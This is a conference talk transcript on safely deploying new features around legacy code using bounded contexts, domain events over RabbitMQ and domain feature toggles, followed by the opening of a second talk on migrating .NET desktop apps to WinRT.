hardly there to ask who has got such a beast. This is classic. The admin website for this legacy hotel reservation system happens to have something to set room rates, set discount rates, and add a discount rate. 
And then this was used for something totally different in the past. And now all of a sudden I want a sales support system. And so you have a choice of either kludging that on top of the existing system or building one of those autonomous bubbles. And for that, in the bubble, all your business rules, all the good stuff, campaigns, frequent guest points, whatever, is in there. And it gets fed from the legacy database via this thing. It doesn't matter what you use. There's the classic sort of ETL job. You can use some sort of method calls to post this to some REST API. That's just transport. Or you can make this separate bubble listen to a stream of events. And this is really messaging. Doing this through messaging and events is the route we're going to go in this session because it's the least coupled way of doing that. You pretty much just want to publish those events. You can go live very, very safely because you essentially don't have to touch anything in the existing legacy system. If you have identified the right kinds of events, then in this case the sales system is just one more subscriber to this thing. And you can add as many subscribers as you want, as many systems as you want. And that's, of course, the snake oil part. We're going to look at some caveats and complications for that. Here's a hint. Whenever I've done one of those bubble strategies, the nice, clean stuff, it should be easy to work with, right? And that was often only about half of the overall effort going into this. The full other half of the effort, or more sometimes, goes into writing this anti-corruption layer, which is a sort of round peg, square hole kind of thing, translating concepts and data structures and what have you into things which are understood by this nice autonomous bubble. So basically the anti-corruption layer here maps between ugly and clean. And it's surprisingly labor intensive to do that, in my experience, compared to the actual bubble, which is a sort of breath of fresh air kind of thing. So I'm not going to go into this. This is a detached bubble where you use a repository pattern and, in this case, the sales context doesn't have its own database. We're going to go beyond that. We're going to work in autonomous bubbles. So how do you pick what's in one of these bubbles? Because clearly it's been done before, right? Anybody who has to write this new piece of functionality, it's not that anybody deliberately sets out to mash that all together with the existing stuff, right? So what's your guide fence for actually picking what is in your bubble and what's outside? This is where this domain-driven design concept of a bounded context comes in. And it's really a business thing. The definition is somewhat cryptic: within a bounded context, the ubiquitous language of the applicable model is used consistently, naming, namespaces and so on. And it has consistent levels of abstraction and so on. What does that mean? Let's have a look. Let's say that we have two of these contexts. Everybody pretty much has an authentication and authorization context or something like it. And that context is very much one with an established domain language. When you look at logins and authorization and so on, you think about users. You think about registration.
There's the concept of logins, logout, forgotten passwords, changing passwords, deleted accounts, roles. And then there is confirm reservation. Wait, confirm reservation. That doesn't ring right, okay? That doesn't make any sense. Confirming a hotel reservation, if you put it together, just forget the technology, just language-wise: does that fit into authentication and authorization and logins and so on? No. So this is the part where you do your sort of context map. You kind of figure out what the major sort of problem areas, if you will, or solution areas are, the major sort of things within which you use consistent language. You figure that out. And it's actually a very, very non-technical activity at this level. It's entirely linguistic. It's entirely pictures in your head. That's how you know what should go into which bubble. Because if you can manage to build systems like that, or in our case, because this is going live for cowards, if you can fake your way out of having to build such systems, and we're coming to that, then you are in a good place. You're in a good place because you won't have such a highly coupled system. And it would be easier to test. Why is that? The ideal architecture diagram, right? We used to do all sorts of UML stuff in the early 2000s, late 90s, and so on. And I found this picture in my head of what the ideal architecture diagram, one which actually makes sense, looked like: enterprise architecture. You probably know those, printouts big enough to fill a wall in some cases. Many boxes, many arrows. What happens to those? They kind of yellow on that wall and no one ever looks at them and they write the code. That always happened with UML. I never understood why. But I found the sort of image of the ideal architectural diagram. It has something like no more than six boxes and maybe nine arrows. This is for non-technical stakeholders: how to debunk the architecture diagrams you get from your technical folks. Six boxes, nine arrows. Why is that? Because the human mind can't really concentrate and focus on more than six or seven things at the same time. So there's no point in making a bigger architecture diagram. Okay. So how can you design a system then? Well, you design it on a human scale where people can actually reason about it properly. Hence that tongue-in-cheek rule. I thought it was tongue-in-cheek, but I've actually applied it a couple of times. It's amazing what it does. Anyway. So look at this thing. There's only one arrow between those two boxes. That was the wrong one. Oh, come on. Awesome. There's only one arrow between these things. By having clean bounded contexts, you reduce the number of things which move between them. Say, for example, in here, you had confirm reservation for some bizarre reason in this context. Can you just about imagine what happens when someone does a reserve online over here and at some stage they want to confirm the reservation? They have to call back into this thing here. Of course, that's no longer a pure authentication and authorization context. It's now something like the Wolpertinger thing. It's now a mixture of many things. It's fish, it's fowl. It's logins, it's confirming hotel reservations. It's all mixed together. And that means, imagine if just that one concept was out of place, you would have another arrow going back there, and every arrow is some kind of method call or something. And before you know it, you get this mess of things which all point at each other and so on.
And the starting point for not having that mess is entirely non-technical. It's linguistic. It's meaning. And that makes kind of intuitive sense because, well, if you look at your average iPhone app, it does one thing. It was one thing only it does it well. It's a thing which does authentication authorization well, not likely, but it does hotel reservations, whatever. And so it makes each one of those things could be its own little website which does nothing but that one thing. The fact that it's actually exposed to some API, be it an interface in C sharp, be it REST, be it listening to messages, it actually doesn't matter. These are just transport mechanisms. Think of each one of those bubbles as its own standalone application. Every other world consists of small standalone, isolated, easy to maintain. That's the snake oil part. Anyway, easier to maintain applications. So inside those bubbles, if you drill down one level, you'd have more arrows if you care to draw them. But at the top level, it's at a human scale. It's at a, or moreover, it's at a business level scale. It's at a stakeholder who aren't geeks, who actually absolutely must be in this exercise of establishing those boundary contexts and the context maps. They must be in there for two reasons. First of all, they need to validate this. This is actually not the model of some particular system of yours. It's the model of your business. The other reason why they need to be in that room is because without them in the room, we're all going to geek out. Before you know it, we will talk about JSON, about SQL, about all sorts of acronyms, right? That has no place in that conversation. This is a language and business and a level of abstraction discussion. The purpose is to identify what bucket your code goes in. So beautiful. Oh, by the way, yeah, there's Fowler who talks about those domain events, which you can have bounded contexts, communicate with ordinary method calls and all sorts of things. It's just for this demo, I've chosen the most loosely coupled way of doing it, which is pops up with domain events. So yes, well, if we had all that, we wouldn't actually need to refactor, right? So that sounds wonderful in theory. It is in practice, your code isn't like that, but it's not really about the code. As mentioned before, this is business. One thing I see a lot is when we get into modeling those bounded contexts and so on, we drift into this sort of, oh, but the admin side, it's not like that. And where does the admin side fit into the bounded context? Well, it kind of doesn't in this, it's not in this model. It probably has lots of different concerns. For example, updating discount rate, you have a sort of the reservations domain within that bounded context. And it's imagined your legacy code with those bounded contexts kind of superimposed. So it's a business discussion to identify an ideal world where one bounded context is one system, right? And let's say you've had that discussion. And for that, you absolutely need the business stakeholders in the room because without them. Well, first of all, you learn a lot. Second of all, you don't really want to geek out on this stuff. Then comes the part, which is the truly dark magic, which is how, given that you have all this legacy code, can you actually go and make it behave like that? You have two choices. You can do the great rewrite, the great one year rewrite. Why doesn't that work? Who's tried the great sort of six to 12 months rewrite and refile? Yes, did it work? Yeah. 
Say, why doesn't it work? Because it's frustrating for the business because at the end of that one year rewrite, they get what they perceive as they already spent the money on it already half. During that year or half year rewrite, people howl for fixes and new features, all the rest of it. And so you get these sort of things living in parallel who never quite meet. And if they meet, it turns into a mess. I forget it. Much better to have those bubbles and give incrementally more features. One way to do that, if you do the great big waterfall thing, but now you go away and you look at your entire business and you identify all of those events which move between those bounded contexts at a business level and identify them all and have another huge diagram on the wall. Remember, you couldn't have more than about six to nine or whatever we said earlier, nine arrows or so. It gets complicated, right? So you do it one at a time. Somebody asks for a new feature. The first thing you do is you assess what domain events are needed in order to fulfill that requirement. You do something like that exercise we saw with the authentication and authorization and the sales, the new sales system context. And you may, you can, this is to assess what information would be needed by a new hypothetical bubble which fulfills this new requirement. The next part is where it gets evil. How do we make the legacy code publish the events? You see, the theory is there is one place in this code where all the information comes together. For example, for entering, I don't know, hotel room discount, hotel room discount rates in the admin system, that admin system, no matter how messy it is, will have one place where all the information pertaining to that comes together and is available and could therefore be pushed out by some sort of event published subscribe mechanism, right? Very often, the most evil place where that happens is very close to the database where the legacy system hopefully at some stage makes up its mind that it has all the information rights to the database. So in extreme cases, I've been known to resort to triggers to actually then fire off some sort of event. So you need to identify those seams to see where you can harvest this particular domain event. Lastly, you want to record this thing somehow because it's nice to be able to replay those later. For example, if you can throw some sort of event store into this, you can fake your, with like, sorry, with emergent design, you can fake yourself all the way into a sort of event store CQRS kind of thing without actually touching much of your legacy code. It would be really, really cool by just adding those event broadcaster things, open close principle, remember? You add those event broadcasting things into your legacy code, which hopefully means you don't have to touch too much of all this junk. And at the same time, you can say you're doing CQRS and event sourcing if you manage to kind of publish events which are good enough to populate aggregate routes, all the rest of it. So you can look very, very cool if you do this right. And that's, of course, really complicated, which is why you do it. One small requirement at the time, if it's smaller, it's less complicated. Finally, one immediate benefit is you can, now that you've got all those domain events coming out, for example, reservations made, reservations canceled, things like that, you can, the immediate benefit is you can actually harvest those. 
How many of those, how many reservations and cancellations did we have on an average day in July, that kind of thing? Business will love it. Unlike the one year, giant refactoring in the sky, you begin to have feedback and value very, very early before you even build this new feature just by virtue of instrumenting your code. Lastly, you consume the thing who needs to subscribe to the events. And now comes, this is more or less the end of that. And now let's look at, what did I kill the code? Yeah, it's kind of a, for it all, men are called, and I say egg instead of never mind. Okay, sorry. Anyway, let's look at some code. And if you look at, this is the dumbest reservation system in the world, right? It truly is, in this being a demo, the odds are that it won't even work. For example, like that. Wait for it. There you go. It's a very dumb reservation system. For starters, you can just reserve rooms, but it's not for anybody in particular, right? They still do that in Excel on the side. And you can also only reserve for one day. So you can reserve for the 14th, for example, I can make reservations of 10 available rooms. It's also a pretty small hotel. And I can also cancel reservations. And it's been done by hippies, and it's like, it really is legacy. It's absolutely dreadful. So someone says, hey, can you do something? Like we'd really like to know a little more than that. It tells us nothing, right? We would like to see, for example, some information. We need a report and some information which tells us how many cancellations and reservations we had every day. Can you do something? It's kind of like, anyway, I was going to make a joke with Kentucky Fried Chicken. You heard of Kentucky Fried Chicken? Man coming to a veterinarian's office in a panic carrying a bucket of Kentucky Fried Chicken. Doctor, doctor, can you do something? Anyway, this is legacy code. Never mind. Back on topic, let's have a look at this. It's a very dumb system. And you can see here, this is classic ASP.NET MVC. And you can see here that it is a reservation system. And you have a bit of somebody give a first shot at bracketing that into some acceptance tests which may or may not work. There's checking in and checking out and so on. Given 10 rooms available at check-in and so on and so on. But that's about as far as it goes. This is the booking controller, which is really, really messy. You can see here. We have our vacancy and room rates and calculations and all mixed into the controller logic. And here is this reservation function where somebody wishes, if somebody posts, reserves or cancels, it first figures out if it's a reservation or whether it's a cancellation. And here is a really bad sort of thing which you get in legacy code. If this was a proper sort of domain modeling exercise in DDD style, language in here shouldn't increment. Well, that's increment and decrement, right? What are those? Have you ever seen a hotel, somebody working in a hotel? Oh, thank you, sir, for joining us next Saturday to Monday. Let me just decrement the number of available rooms. No, no, no. This brings us right back to consistent domain language. Even the code, and this is really important when it comes to identifying our events and not being led astray by all sorts of technical events like error-raised or stuff like that. 
Right down into the code, namespaces and everything, the name of the game is to write in in such a way that the hotel manager could sit here, look at the source code, and you could, with a guided tour, this guy would roughly sort of understand what is happening. That's the kind of abstraction. You want to be at the top level as you drill down. Eventually you get into the more technical stuff. But there should be a level of abstraction all the way in your code where business stakeholders can understand that. That's the key for divvying this stuff up and not having everything bleed into each other. So you can see there's not much here. It's really quite, there's some sort of a database which does stuff. Like it's a very dumb database for starters. It's a memory. So if you're looking at a production-ready system and so on, let's look at the next step here, if you recall from this, we looked at this code and we have assessed that what we want is a make reservation and a cancel reservation event. So let's go there and load a version of this, which actually has that. Playing Russian roulette here with live visual studio. So let's look at that same message bus thing after we've instrumented this thing. So you can see here that something new has, two new things have appeared in the solution, a so-called message bus and a pile of unit tests. Let's look at this booking controller, which we took a look at. And the part of the booking controller we were interested in hasn't actually changed at all. Open-close principle, we haven't touched that and yet we want to sort of hose out those events which we can later use. And we've already said that sometimes in legacy, the only place where you can be sure that nobody mucked with it is the final stop when things go into the database because that's where in the end everything has to come together, whether we like it or not. And this was, it's not always the case, right? It depends on what you've got. But that's the assumption I made here. And so let's have a look at what's in this decrement number of rooms available mess. The decrement number of rooms available mess has acquired something called publish event reservation made on a certain date. So it decrements, as we had before, the number of occupied rooms. But now this is additional line, right? Open-close principle. We haven't actually changed this thing, but it now publishes an event here. And if you look at what that actually does, it makes a new reservation, a new reservation made event, and it publishes that on a mythical message bus here. And that message bus is actually injected into the reservation DB, another additive change. So your reservation DB thing, legacy thing, has no code changes. It only has additions to code, right? And assume for the moment that this has the customary 500 to 5,000 lines of legacy code in it. This is a good thing because it keeps your regression test load down. So additive changes. All right, that's marvelous. So this would probably have been several months projects. No, it wasn't. This is actually this message bus piece of infrastructure. What actually is that? Let's have a look. Nothing. It's nothing. It's an interface, right, and it's a stub. They go back to this. Here's your message bus interface, which has one method called publish. We've seen that. And there's a couple of other ones. Like there is something called IEvent, which is just like a marker. And then it has a stub where it does nothing, right? So how do we wire it up? Who cares? 
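Roughly what that interface, the marker, the do-nothing stub and the single additive line in the legacy save path might look like; the names here are illustrative guesses, not the demo's actual code.

```csharp
using System;

public interface IEvent { }                        // marker interface, nothing more

public interface IMessageBus
{
    void Publish(IEvent evt);
}

public class NullMessageBus : IMessageBus          // the stub that does nothing
{
    public void Publish(IEvent evt) { }
}

public class ReservationMade : IEvent
{
    public DateTime ReservationDate { get; set; }
}

public class ReservationDb
{
    private readonly IMessageBus bus;

    public ReservationDb(IMessageBus bus) => this.bus = bus;   // injected, purely additive

    public void Reserve(DateTime date)              // assumed legacy entry point
    {
        // ...existing legacy checks and bookkeeping stay exactly as they were...
        DecrementNumberOfRoomsAvailable(date);
    }

    private void DecrementNumberOfRoomsAvailable(DateTime date)
    {
        // ...existing decrement logic untouched...

        // The only change: publish the domain event at the seam where all the
        // information is already in hand, just before it goes to the database.
        bus.Publish(new ReservationMade { ReservationDate = date });
    }
}
```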
We just do poor man's dependency injection. We make a new reservation DB, which gets newed up somewhere in all that rubbish, and we wire it up with a stub which does nothing. So what's the point of that? Where's the value in that? Test coverage. The value is in suddenly having unit tests around this which weren't there before. We're talking about value early. We're now talking about, for example, we don't make this reservation if the hotel is fully booked, right? These were tests. This was in the legacy code, so it should not do that. When this thing is fully booked, you shouldn't be able to make a new reservation, but there were no tests around it. Safe refactoring. You need tests. And by instrumenting this thing with events, it's like a sort of dipstick where you can sort of get a bit of coverage. Because you've identified those seams at which all the information is there to make a reservation, just before it's written to the database or wherever, if you had just this one thing in there which sends that message, then you can write a test saying whether that message has actually been sent. And in this case, the way we do this is we use a mock, a fake service bus. Who's using RhinoMocks or something similar? Yeah. This is one called FakeItEasy. I find it easier to read. Why am I using FakeItEasy? I kind of like it. It does the job and it's kind of a matter of taste, right? It doesn't matter. We fake the message bus and we do the booking for this, and then we verify that a call to the message bus publish method with an event of the type reservation made must have happened at some point in time, right? So the early benefit is test coverage, right? So that's that intermediate refactoring step. So good. Now we have a little more confidence, additive changes, some test coverage and a fake stub message bus. Let's do the next step. Remember the requirement was, well, we really want this extra, this other system which allows us to get some statistics out of this thing. And for that, we want to have those canceled and reserved events published. And so now we have new systems. We have this message bus slash events publisher, but it has acquired a major dependency, in this case RabbitMQ, which is fine. So we implemented our message bus so we can publish events on RabbitMQ. Anybody using Rabbit here? Okay. So there's that. We also have something, a new thing called statistics. I'm coming to the send-online-confirmation thing in a moment, but here's the statistics thing, and it does two things. Again, right at the top level, this is new code, you should be able to see what it does. It deals in reservations and cancellations per day and it updates the reservation statistics. So it sits here waiting for events to come in, and let's see what it does. Now that all depends on whether I actually started the message broker. This is actually the wrong, a little ahead of time. This is actually the wrong demo. You've got a guest phone number here. I'm coming to that. As you can see here, let's leave this one aside. If I submit this stuff, you can see that on the 14th, you have five reservations and zero cancellations. If I make it the 15th and I make a reservation, suddenly that appears, and if I make cancellations, the stats are updated.
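Stepping back to that intermediate test step for a moment, here is a hedged sketch of such a test using FakeItEasy and NUnit, written against the IMessageBus and ReservationDb sketch above; the fixture name and the Reserve entry point are assumptions, not the talk's real test code.

```csharp
using System;
using FakeItEasy;
using NUnit.Framework;

[TestFixture]
public class BookingEventTests
{
    [Test]
    public void Making_a_reservation_publishes_a_ReservationMade_event()
    {
        var bus = A.Fake<IMessageBus>();          // fake message bus
        var db = new ReservationDb(bus);          // poor man's dependency injection

        db.Reserve(new DateTime(2013, 6, 14));    // assumed legacy entry point

        // Verify a ReservationMade event was published at some point.
        A.CallTo(() => bus.Publish(A<IEvent>.That.Matches(e => e is ReservationMade)))
         .MustHaveHappened();
    }
}
```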
So this is a completely separate system to which we publish events via RabbitMQ and it basically uses that instrumentation you've done, you've seen earlier in the earlier example. There were no further changes to the legacy system at all, none whatsoever. The only thing, well, except that we now instead of the stub wired up the actual RabbitMQ publisher. Apart from that, there are no further changes. Again, minimum touch points and minimum coupling and simpler maintainability. So next, well, all right, so this is kind of wonderful, but now we really want to have something where we can send these people an SMS message. Okay, you've done a booking. This is part of an online booking kind of self-help context. I really would like to get some sort of booking confirmation. Again, we can either crack open the legacy code or we can make another one of those bubbles, which is a sort of a guest notification kind of context. Again, there were no, so what do we need for that? Let's take a look at the finished product. You can sort it here. If I put in a fictitious phone number, then you can see that there is still the statistics update up here, but there's also a second quote unquote service, which is because of console app, which sees that room bookings, if I booked three, which sends SMS to these people if they booked rooms. There's none which notifies them of cancellations yet, but it certainly does. It certainly makes those reservations and sends those SMSes. So how did we do that? Well, there's a slight complication here compared to the previous one. The previous, let's look at the events in this. For that, a shared messages project has appeared. Shared messages has a reservation canceled event, and the only thing it has is a reservation date. We had that earlier. That was the earlier system, which had no concept of all at all about individuals. It just knew that one is stupid, but it only knew about one reservation having been canceled on that day. And you had a reservation made, which also only knew about a reservation date. But we have had a change, right? We suddenly needed an additional field, the guest phone number, because this guy is supposed to get SMS messages. Oh, somebody reserves. We've captured that phone number, but how do we get that in here? How do we make sure that this confirmation system, this bubble, can actually receive that phone number? And remember, we got these domain events, reservation made and reservation canceled, which somehow have to go there. And so we have two choices. We can either whack this thing in here and just change the already existing reservation made event, the reservation event, which would violate the open-close thing. We don't want to change it once it exists, because what happens if we change this one? We might break the original calculate statistics of number of reservations, cancellations by day service, right? We would have to touch that. We might break something. We really don't want that. We want that service to keep running safely deployed somewhere, and so we don't have to go live and do another deployment. Remember deploying things safely for cowards. So what we do is we make a version two. The next version of reservation made has both guest phone number and the reservation date, right? And so if you look at the code for the, if in the actual online confirmation part, you can see that, if you go in here, it checks for the routing key, not to get into Rabbit MQ too much. And it basically checks, it only accepts this type of domain event. 
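As a rough illustration of that additive versioning (class and property names assumed): the original event keeps its shape so already-deployed subscribers keep working, and the phone number only appears in a new version that the new consumer binds to.

```csharp
using System;

public interface IEvent { }

// Original contract: the statistics subscriber already in production relies on this.
public class ReservationMade : IEvent
{
    public DateTime ReservationDate { get; set; }
}

// New, additive version: carries the guest phone number for the SMS confirmation bubble.
public class ReservationMadeV1 : IEvent
{
    public DateTime ReservationDate { get; set; }
    public string GuestPhoneNumber { get; set; }
}

// The legacy seam publishes both; each subscriber binds (via its routing key)
// only to the version it understands, so nothing already live has to change.
```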
It only accepts reservations, reservation made version one, because that's version one is the only thing which has what it needs, which is that phone number to send the SMS to. Conversely, if you look at the same thing in the statistics thing, the one we had earlier, the updates, the updates stats thing, once I drill down to that level, it deals in the original reservation made and reservations canceled. So it's able, if you look into the record thing, it's able to deal in the original event type. So I don't have to touch it. And it keeps running. So you have these immutable message versions which live in this shared thing, and gradually you add more and more, and then you can have a sort of, as you retire old legacy services if you ever do, some of those messages won't be needed anymore and don't need to be routed anymore, but in the meantime it's all additive. Again makes it much, much safer to go live, right? Pops up, you send those events, listeners are there, they update the databases, independent, small bubbles. Okay. So now we have, where are we at? We have a system which, in our, where we've sort of identified those cancellation and reservation events, where we publish all these, and we've sort of done the entire, we've done the entire cycle, and we've gone live in two iterations already, one, small iterations. One for getting the original statistics calculated, and then another one for getting those SMS messages. Both were entirely additive, going live for cowards, less QA effort, less, after the, the only hairy part in this is where we have to, to, to harvest, sort of, make that legacy code, publish the events, but that, that gets less sketchy every time because you understand better where you can hook into this thing, and it's, it's still the lesser of two evils. And so additive changes, you gradually build on those little bubbles. So last, what happens if it goes wrong anyway? What happens if, for example, oh my God, the brand, brand new RabbitMQ server is down, nothing works anymore? That's where the sort of final concept I wanted to sort of throw in the pile for going live safely today comes down, is, it comes in. This is the concept of a, like a domain feature toggle. Who, this isn't the same thing as the versioning and source control concept of a toggle. Who here is using feature toggles? Yeah. You are using it sort of, so you don't need to branch or something like that? So, yeah, probably. This is a slightly different idea, which we actually chanced in our shop in sheer desperation. You have all these nice services, which are, some of these, it's less of a problem than the ones which are fed by domain events. But if you have a SOA thing, but some of your services, which you need for your read models, this applies particularly to read models, of course. If you need to, in order for the, for the user to see, for example, what bookings exist, at some stage, well, you often need to make a query, right? So some REST thing or SOBA, who knows what. And now you have all these separate services. Unfortunately, the damn box goes down. The service is dead. One great big clattering error message appears on the user's screen. This is reality of the legacy stuff. And once you pull it apart, you have more moving pieces, which can go wrong. And that exactly happened to us. This was a new service, a bubble context. In this case, for a toll processing system for a bridge. And, oh, man, it runs on something which sits on top of the Amazon, the Amazon EC, whatever, cloud. 
What are the chances of that ever going down? And last year, it goes down. And because this was sort of the analog of this admin side thing, which does lots of different things, basically our little service, the tolling service in the back, going down took out the entire website in the front, which needed to talk to it. And if it couldn't, it blew up. So what do you do? This is how we went into this domain feature toggles thing. And what it does is very, very dumb, in a nutshell. On a per feature basis, you can switch it off, right? Promotions enabled, online bookings enabled; where you have this, for example, the sort of product to which this 'enter your phone number' feature belongs, the context it sits in in the system, is online bookings. If I set that to false and switch this thing off, as you can see here, all of a sudden, it looks like the old system. I can make my reservations and all the rest of it. We assumed here that something in the back, which is needed for that new feature, which is making bookings by phone number, is no longer available. And therefore, we switch it off. You can just about imagine the messy if statements in the back which do that. The key difference to a feature toggle is that it's actually a product thing. You can actually use that to monetize a software as a service thing. That's kind of, in my mind, the right way to think about it. You have this guy, your product owner, who says, yeah, this user should be able to get those confirmations. Therefore, you need to enter the phone number. This guy should do this and this and this. So it's definitely not a source control thing. It's a switch. And it's a product level, domain feature level kind of switch. All right. So how does this all then come together? What it comes together as is a gradual degrading of the user experience, a managed 'oh God, the entire site fell over'. No, it doesn't. Because you have those reasonably clear bounded contexts which deal with specific products and the functionality they implement, you can say, okay, that service, which is one bounded context and has a couple of things in it, is down; that is down; that is down. These different services are needed to provide the following user level functionality and affect the user interface in the following way. Therefore, let's somehow engineer our user interfaces so the feature set sort of gradually gets restricted as the underlying services go bang. So it goes like this: service goes down, then automatically or manually. What you've seen in config files is, of course, the chainsaw thing: it's 3 AM, you whip into production and edit config files. That's the crudest way. You can also do some sort of monitoring when the services go down. Something knows what needs those services and therefore knows which features to switch off, and could automate that. It screams loudly by sending alerts. Then after the services are restored, the features get switched on again. So this is how you get yourself a nice safe fallback with a controlled way of restricting the user experience. Hard to do in practice, but we found it worthwhile. It saved us from a couple of other things. It also means that you can selectively make features go live for subgroups of users or for products, much more flexible, much simpler. With that, seeing as we are out of time: summary. Find legacy code seams, identify those bubbles using bounded contexts and so on. Find a way to get data into these bubbles.
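To make the toggle mechanism concrete, here is a minimal sketch of a configuration-backed domain feature toggle. The configuration key, class names and view model are illustrative, not taken from the actual system:

using System;
using System.Configuration;

public static class DomainFeatures
{
    // Reads e.g. <add key="OnlineBookings.Enabled" value="false" /> from the config file,
    // so a feature can be switched off with a config edit rather than a redeploy.
    public static bool IsEnabled(string featureName)
    {
        var value = ConfigurationManager.AppSettings[featureName + ".Enabled"];
        return string.Equals(value, "true", StringComparison.OrdinalIgnoreCase);
    }
}

public class BookingViewModel
{
    public bool ShowPhoneNumberField { get; set; }
}

public class BookingPageBuilder
{
    // The "messy if statement": if the toggle is off, the page simply renders
    // like the old system and never calls the new back-end service at all.
    public BookingViewModel Build()
    {
        var model = new BookingViewModel();
        if (DomainFeatures.IsEnabled("OnlineBookings"))
        {
            model.ShowPhoneNumberField = true;
        }
        return model;
    }
}

With something like that in place, degrading the user experience when a back-end service dies becomes a controlled product decision rather than one great big clattering error message.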
The way we looked at for getting data into them was publishing those domain events. Find a way of safely degrading the user experience if the whole apple cart gets upset and falls over. Automate everything so you can do this, turning around fast and small pieces to production regularly. And finally, eliminate waste in your processes. This is a big part of that because it reduces regression tests and that wait time which happens until they're all done. That's about it for today's snake oil. Thank you very much. Any questions? I'm here for another 10 minutes or so.
|
Production. It's where legacy code grinds into shiny new SOA, CQRS and event sourcing goodness. It's where new ideas must go. It's where failure is not an option and the stakes are high. Breaking it can seriously ruin the "Agile" thing you've been trying. It's all or nothing. On the other hand - maybe you could cheat. The talk presents a step-by-step approach for not getting caught with the proverbial pants down when rolling out new systems in legacy-heavy, dependency infested fragile environments. The emphasis is on practical examples for achieving the necessary separation of concerns, deployment automation and monitoring in small increments as part of day-to-day development work, in what constitutes reality for most dev teams: Not enough time for a large concerted effort to clean up code, automate and put tooling in place. Legacy code divide & conquer: Using Domain-Driven-Design techniques to delineate areas of responsibility and create "bubbles" of side-effect free functionality which can be deployed safely. "It's broken! Quick, switch it off...!" How to use business domain level feature toggles to deploy new functionality safely and gracefully degrade end user experience when services fail. Automated deploy, chainsaw edition: An example for getting from manual deploys to pushbutton automation in small (relatively) simple steps. Watch it like a hawk: How to move towards log aggregation, monitoring and alerting that radiates troubleshooting information and business metrics. Combined with domain toggles this can lead to a system that: 1. Detects malfunctions, 2. Switches off affected functionality in a controlled manner, 3. Alerts operators.
|
10.5446/51500 (DOI)
|
Is the speaker on? You can hear me? Wonderful. So then I think I shall begin. Welcome everyone. Thank you for coming to this talk. My name is Rocky Lhotka and I am the CTO at a consulting company in the United States called Magenic and it's my pleasure to come here and speak to you. I enjoy coming to Norway. I think this is the fourth time that I have been here and it's such a beautiful country. This time I was also fortunate enough to be able to bring my family so they're able to see the beautiful country as well. So thank you for allowing me to be here and to speak. My topic today is how to migrate from Windows Forms and also WPF or VPF and Silverlight to WinRT. And so a lot of this talk is going to be about strategy and approach and less about code. And the reason for this is that a lot depends on where you're coming from. What is your start point in terms of what kind of coding techniques and technologies you're using in Windows Forms, whether you do or don't already know XAML with WPF or Silverlight, and whether you're using two-tier client-server, or service-oriented, or N-tier architectures. And so all of these are important considerations. And so instead of trying to show maybe one particular approach or two different approaches, I'm going to talk a lot about the concerns. And I will show a little bit of code just to reinforce how some good planning will help. But a lot of this comes down to good planning and thinking ahead. Now if I can convince, there we go, PowerPoint to move forward. So before we get into too much strategy, and it's hard to see with the lights, but how many of you are already developing with Windows 8 and the Windows runtime? I think that would be three. And that's good. It's better than none. How many of you are primarily using Windows Forms for all of your application development now? How many of you are using WPF? Silverlight? So the one person who says that he uses Silverlight, congratulations, you are in the best possible position to move to the Windows runtime. Good choice. Now I realize that everyone says that Silverlight is dead. You should avoid Silverlight because it's a dead end technology. And I will actually argue that so is WPF, right? Or VPF. VPF is dead. So Silverlight is dead because Microsoft is no longer investing in Silverlight, right? I mean, is that not the reason? We're all scared to use Silverlight because Microsoft is not putting money into the future of Silverlight. So the question I have to ask you is how much money do you think Microsoft is putting into the future of VPF? Nothing. They have one or two developers keeping it running, right? They're doing maintenance on it, just like they are with Silverlight. How many developers do you think Microsoft has working on Windows Forms? A couple. Maybe two or three. And here's the real question for you. When did Microsoft stop investing in Windows Forms? When was the last time Windows Forms got major new features and was enhanced in any important way? Hmm? 2005. So Windows Forms has been dead for eight years, and yet all of you are still using it. So why be afraid of Silverlight? I'm not trying to convince you to go to Silverlight. I'm just trying to impress upon all of you that this idea that Silverlight is dead or that VPF is dead, does this really matter? Microsoft has a 10-year commitment. Once they ship a platform, they continue to make it work for 10 years. So Windows Forms ships in Windows 8.
So you can continue to do Windows forms for another 10 years. Congratulations. Are you thrilled? If you're doing VPF, the same thing is true. Of course, if you're doing Silverlight, Silverlight ships in Windows 8 also, and so you've got another 10 years of Silverlight. So my point is that all three technologies are in the same position. So the question then is why are you interested in going to the Windows runtime, or even maybe what is the Windows runtime? So Windows 8 really represents two different programming models or two different platforms in one. It represents the Win32.net platform, and it also represents this new Windows runtime platform, or WinRT. The Win32 platform only works on Intel-based computers. Also my laptop, which is running an Intel CPU, can run the Win32 side and the WinRT. But if you have an ARM-based tablet, a Windows 8 computer that has an ARM chip, it can only run the new Windows runtime code. So this is the big difference. So the diagram that you see on the screen represents the Windows 8 operating system, showing all of the Win32 components in blue and all of the new Windows runtime components in green, and they're all, both are present on any Intel-based computer. So the way that I think about Windows 8, especially on an Intel computer, is it's just a slightly faster version of Windows 7, plus it has the Windows runtime. When Windows 8 first came out, someone asked me if I thought that Microsoft would ever allow the Windows runtime programs to work on Windows 7. And I said, yes, you just have to upgrade to Windows 8. No? That was a joke. All right, moving on. If you do Windows Forms today, the good news is that Windows Forms exists in Windows 8 on the desktop side. Also, if you do WPF or Silverlight, those technologies exist also in Windows 8. So there's no immediate need to worry about changing or upgrading or, right, there's no pressure. Even if your company or organization upgrades to Windows 8, your applications almost certainly will continue to work. But if you are going to start developing in the new Windows runtime platform, and you're coming from a.NET world, right, so you're coming from Windows Forms, VPF, or Silverlight, the most likely place that you will end up is in the.NET version or.NET environment inside of the Windows runtime. Now the Windows runtime supports three different programming models. You can program in C++ using XAML or C++ with DirectX, but C++ is one of them. You can program in.NET, so you can use Csharp or Visual Basic and XAML, and you can write software that will run in the Windows runtime, or you can use HTML and JavaScript and write software that will run in the Windows runtime. And I'm only going to today really talk about the.NET perspective, because if you're coming from.NET, I assume that you would like to reuse some of your code and reuse some of your assets. And so as you move into the Windows runtime, you'll probably want to bring along as much of your Csharp or VB code, and if you already are using XAML, as much of your XAML as you can, right? I think that's a fair assumption. So this graphic shows kind of the migration picture, depending on where you start from. Like I said, all of the current smart client technologies just work inside of Windows 8. And so as long as your users are using Intel-based computers, then you have no particular reason to do any sort of upgrade, at least not soon. 
